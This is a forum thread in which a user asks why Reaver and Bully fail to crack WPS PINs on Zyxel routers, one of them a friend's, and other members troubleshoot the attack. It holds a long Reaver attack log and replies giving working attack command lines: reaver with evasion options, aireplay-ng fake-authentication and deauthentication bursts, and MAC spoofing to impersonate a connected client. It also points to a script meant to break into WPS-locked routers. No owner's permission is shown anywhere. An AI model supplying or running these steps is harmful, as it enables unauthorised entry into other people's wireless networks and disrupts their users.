Results 1 to 27 of 27

Thread: Reaver Not Working on Specific Zyxel Brand Routers (Any Solution). And why ??

  1. Reaver Not Working on Specific Zyxel Brand Routers (Any Solution). And why ??

    i am using kali Linux 1.1.0 and reaver 1.5 and Bully (Latest Git). the problem is Reaver is not working with most of the Zyxel brand Routers, WPS is enabled. i tried reaver and bully on my Friends Router and i get nothing just " WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null)" and after sometime when it successfully associate then i get EAPOL warning and sometime "WPS transaction Error" . interesting thing is i tried this reaver on three Zyxel routers , Same result and also these all Routers Manufacturing date is 2009-2010 (When WPS flaw is not Gone Public). This problem is only related to Zyxel F4:3E:61:xx:xx:xx Brands. So someone explain me why this not working with these Brands?? And also Help me to resolve this issue . (See the below Output and Link for my bully output and WPS settings Screen Shot)..

    http://i.imgur.com/NngbBZ7.png
    http://i.imgur.com/uSdk9wE.png


    reaver -i mon0 -b F4:3E:61:9C:80:xx -vv
    Reaver v1.5 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    [+] Waiting for beacon from F4:3E:61:9C:80:xx
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: (null))
    [+] Switching mon0 to channel 11
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Associated with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete. Elapsed time: 0d0h0m8s.
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [!] WARNING: 10 failed connections in a row
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Nothing done, nothing to save.
    [+] 0.00% complete. Elapsed time: 0d0h0m15s.
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [+] Sending EAPOL START request
    [+] Sending WSC NACK
    [!] WPS transaction failed (code: 0x04), re-trying last pin
    [+] Trying pin 12345670.
    ^C
    [+] Nothing done, nothing to save.

    Thanks in Advance..

  2. Any Solution ?? :/

  3. #3
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    There's such thing as a firmware update... Probably only set to WPS PBC.

  4. Never Updated the Firmware and also AUto Firmware Updating is Not Supported Too....
    And also i Think WPS is Not Only SET to PBC.. :/
    (Please See ScreenSHot)..
    http://i.imgur.com/NngbBZ7.png
    Last edited by FurqanHanif; 2015-04-19 at 12:17.

  5. #5
    Join Date
    2013-Jul
    Location
    United States
    Posts
    520
    Could also be that the AP only acts as the registrar in the exchange and reaver also tries to be the registrar. You can't have 2 registrars. Try pressing "Add external registrar" and see if that works.

  6. Tried " Add External Resgistrar" Same issue, and also When i restart/Rebot My Router or it Restart because of power failure , Both Pin Sections become Blank ......

  7. #7
    Try , -S -N -L -E -d 1 -r 9:61 options..

    best options for zyxel modems...

  8. Quote Originally Posted by Saydamination View Post
    Try , -S -N -L -E -d 1 -r 9:61 options..

    best options for zyxel modems...
    Tried Every Combination , Same issue ...

  9. #9
    Umm... I think zyxel modem crushed after bruteforce...

    Use airodump-ng and listen it... open wireshark and read message ..

    Beacons , probe respons...

    İf you see so much block messages .. Changce your mac adress ( macchanger)

    İf you see so much error -failed message .. Probably, modem crushed..!

  10. Quote Originally Posted by Saydamination View Post
    Umm... I think zyxel modem crushed after bruteforce...

    Use airodump-ng and listen it... open wireshark and read message ..

    Beacons , probe respons...

    İf you see so much block messages .. Changce your mac adress ( macchanger)

    İf you see so much error -failed message .. Probably, modem crushed..!
    Here is the Wireshark Output . Please See this....

    http://www.fileconvoy.com/dfl.php?id...c452c189a6e471

  11. #11
    Join Date
    2015-Mar
    Posts
    127
    Not every Access point is vulnerable. At this time only 2 1/2 chipsets are vulnerable to even the pixiewps attack, which u don't seem to be using.

    The wps pin attack which you appear to be using requires much more time.
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    [!] WARNING: Failed to associate with F4:3E:61:9C:80:xx (ESSID: TOILET)
    When I've come across the error above, two things helped me.
    1. getting physically closer to target router, or try (-t20 <<< increase the receive timeout time)
    2. use a spoof client mac address and let aireplay-ng handle keeping association with router

    reaver options
    -A another program handles association
    --mac=00:11:00:11:00:11
    -t20 Use the forked version of reaver. by t6x that has pixiewps built in.

    Once you run the reaver linked above, report back the chipset.
    Last edited by nuroo; 2015-04-26 at 20:50.

  12. #12
    Join Date
    2013-Jul
    Posts
    843
    To FurqanHanif

    MTeams suggest you go here http://forum.aircrack-ng.org/index.php/topic,868.0.html

    There are two links for the VMR-MDK009x2 package. Read thru the help files, setup the config file and run this automated script against the router. This script is designed to break thru WPS locked routers BUT we use it all the time against unresponsive routers. Read thru the WPS Reaver issues 675,676 and 677. You want the VMR-MDK009x2 package. Any questions leave your comments in the aircrack forum.

  13. #13
    hi Furqanhanif,

    I saw your cap file... ... Target AP not answer your request.. There is no probe respons or any information about modem...

    Modem is unusable....

    try other APs ..

    Good luck ...

  14. Quote Originally Posted by mmusket33 View Post
    To FurqanHanif

    MTeams suggest you go here http://forum.aircrack-ng.org/index.php/topic,868.0.html

    There are two links for the VMR-MDK009x2 package. Read thru the help files, setup the config file and run this automated script against the router. This script is designed to break thru WPS locked routers BUT we use it all the time against unresponsive routers. Read thru the WPS Reaver issues 675,676 and 677. You want the VMR-MDK009x2 package. Any questions leave your comments in the aircrack forum.
    WPS Lock is Not The Problem (WPS is Unlocked i checked from Wash) , This script also not working....

    Please see the wireshark Cap File and Check.....

  15. Quote Originally Posted by Saydamination View Post
    hi Furqanhanif,

    I saw your cap file... ... Target AP not answer your request.. There is no probe respons or any information about modem...

    Modem is unusable....

    try other APs ..

    Good luck ...
    But Why Target AP is Not Replying ??? WPS is Enabled (i Checked from wash). and only this type of AP causing Problem..

  16. #16
    Quote Originally Posted by FurqanHanif View Post
    But Why Target AP is Not Replying ??? WPS is Enabled (i Checked from wash). and only this type of AP causing Problem..
    I have a broken modem. When I run it seem as AP. WPS active .. But it does not answer me...

    Like in your post..

    Try this , and you will see that Anybody connect AP... Because Unusable...

    Code:
    Airodump-ng mon0 -c X -b XX:XX:XX:XX:XX:XX

  17. Quote Originally Posted by Saydamination View Post
    I have a broken modem. When I run it seem as AP. WPS active .. But it does not answer me...

    Like in your post..

    Try this , and you will see that Anybody connect AP... Because Unusable...

    Code:
    Airodump-ng mon0 -c X -b XX:XX:XX:XX:XX:XX
    Broken Modem ?? i don't get it. i am able to connect to the router and it's working fine, but only Reaver Not Working Against it even When WPS is Enabled. Why.. ? Still Unclear.

  18. #18
    Join Date
    2013-Jul
    Posts
    843
    To: FurquanHanif

    The question should not be why but how. People in these forums are trying to help you. If you do not want to use prepared tools then try to get the router to respond manually thru terminal windows. Here is a simple method:

    See if the router will respond to aireplay-ng

    Start reaver with a channel setting we suggest you use this command line. You must set a channel or aireplay-ng will not function.

    Leave it running

    Open a terminal window

    reaver -i mon0 -a -f -c 6 -b xx:xx:xx:xx:xx:xx -r 3:10 -S -E -vv -N -T 1 -t 20 -d 0 -x 30

    Set the correct channel and mac address

    Open another terminal window

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Leave it running

    Now Hit the router with some deauths

    Open a third terminal window

    aireplay-ng -0 10 -a xx:xx:xx:xx:xx mon0

    Hit the router a few times with short deauth bursts

    Do not give up. We have had long unresponsive routers suddenly give up the WPS pin with one request from reaver.

    These are simple methods. More advance techniques require automated scripts.

    MTeams

  19. #19
    İf Modem is working fine... Try this..

    First , connect AP like a normal user... (visit web sites) (for traffic)
    Later, try to find your password with different device ..

    Reaver -i monX -c X -b XX:XX:XX:XX:XX:XX -vv

    You can receive M1 "probe response" message ( all information about modem )

    No Traffic = No probe response = Failed to associate with target AP...

    Or you can try this...

    sometimes ( I don t know why?) İf I shake or turn my wireless adapter , reaver is running to test ...suddenly...

    turn your wireless adapter .. shake on air....
    Last edited by Saydamination; 2015-05-02 at 14:55. Reason: ok

  20. Quote Originally Posted by mmusket33 View Post
    To: FurquanHanif

    The question should not be why but how. People in these forums are trying to help you. If you do not want to use prepared tools then try to get the router to respond manually thru terminal windows. Here is a simple method:

    See if the router will respond to aireplay-ng

    Start reaver with a channel setting we suggest you use this command line. You must set a channel or aireplay-ng will not function.

    Leave it running

    Open a terminal window

    reaver -i mon0 -a -f -c 6 -b xx:xx:xx:xx:xx:xx -r 3:10 -S -E -vv -N -T 1 -t 20 -d 0 -x 30

    Set the correct channel and mac address

    Open another terminal window

    aireplay-ng -1 10 -a xx:xx:xx:xx:xx:xx mon0

    Leave it running

    Now Hit the router with some deauths

    Open a third terminal window

    aireplay-ng -0 10 -a xx:xx:xx:xx:xx mon0

    Hit the router a few times with short deauth bursts

    Do not give up. We have had long unresponsive routers suddenly give up the WPS pin with one request from reaver.

    These are simple methods. More advance techniques require automated scripts.

    MTeams

    Tried Your Commands , No Luck . Stuck on Sending Identity Response..
    See this Cap File.
    http://www.fileconvoy.com/dfl.php?id...37fbe9b342adad

  21. Quote Originally Posted by Saydamination View Post
    İf Modem is working fine... Try this..

    First , connect AP like a normal user... (visit web sites) (for traffic)
    Later, try to find your password with different device ..

    Reaver -i monX -c X -b XX:XX:XX:XX:XX:XX -vv

    You can receive M1 "probe response" message ( all information about modem )

    No Traffic = No probe response = Failed to associate with target AP...

    Or you can try this...

    sometimes ( I don t know why?) İf I shake or turn my wireless adapter , reaver is running to test ...suddenly...

    turn your wireless adapter .. shake on air....
    Connect To AP and then Try Reaver , Same issue , No M1 , M2 etccc ....

  22. #22
    Join Date
    2013-Jul
    Posts
    843
    MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring allot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor(i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

    Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

    MTeams

  23. #23
    Join Date
    2015-Mar
    Posts
    127
    Quote Originally Posted by mmusket33 View Post
    MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring allot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor(i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

    Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

    MTeams
    This is also the way I do it. Spoofing the mac address in reaver command line -m, with a known client is often key. Also another technique that helps for tuff routers is to let aireplay-ng handle the association.
    Reaver .......standard options............-A (let another program handle association) -m (spoofed client mac)

    Use the -h option also in aireplay-ng, same as spoofed client mac.
    Aireplay-ng .....standard options.......-h (spoofed client mac)

    Distance to router is also a major factor. If you can't get a known vulnerable chipset, then distance to router is likely an new issue.

  24. #24
    Join Date
    2013-Apr
    Posts
    5
    This is good to know. I'm running a Zyxel PK5001Z router from my ISP and I'm having this same issue. I'll try the recommendations in this thread and report back.

  25. Quote Originally Posted by nuroo View Post
    This is also the way I do it. Spoofing the mac address in reaver command line -m, with a known client is often key. Also another technique that helps for tuff routers is to let aireplay-ng handle the association.
    Reaver .......standard options............-A (let another program handle association) -m (spoofed client mac)

    Use the -h option also in aireplay-ng, same as spoofed client mac.
    Aireplay-ng .....standard options.......-h (spoofed client mac)

    Distance to router is also a major factor. If you can't get a known vulnerable chipset, then distance to router is likely an new issue.
    i tried everything including MAC Spoofing stuff , No Luck ... :/

  26. Quote Originally Posted by mmusket33 View Post
    MTeams have had reports that spoofing the mac to that of an associated client solved the problem. You could monitor the AP thru airodump-ng and find the mac address of a client that is transferring allot of data. Next spoof your mac for both the wifi device (i.e. example wlan0) AND the monitor(i.e. example mon0). Next add the mac address you spoofed to the reaver command line thru the --mac=xx:xx:xx:xx:xx:xx.

    Finally during the reaver attack monitor this attack thru airodump-ng. Make sure that the mac address your device is using is the mac address you changed to.

    MTeams
    Tried , Not working..

  27. #27
    Modem crush or wps ia inactive...

    Try your luck with Zyxel Utility ... İf you have it....

Similar Threads

  1. Replies: 26
    Last Post: 2018-02-23, 22:15
  2. Replies: 0
    Last Post: 2015-07-25, 08:28
  3. Replies: 2
    Last Post: 2014-12-03, 01:08
  4. Possible to start reaver with a specific number?
    By soxrok2212 in forum General Archive
    Replies: 3
    Last Post: 2013-09-20, 00:08

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •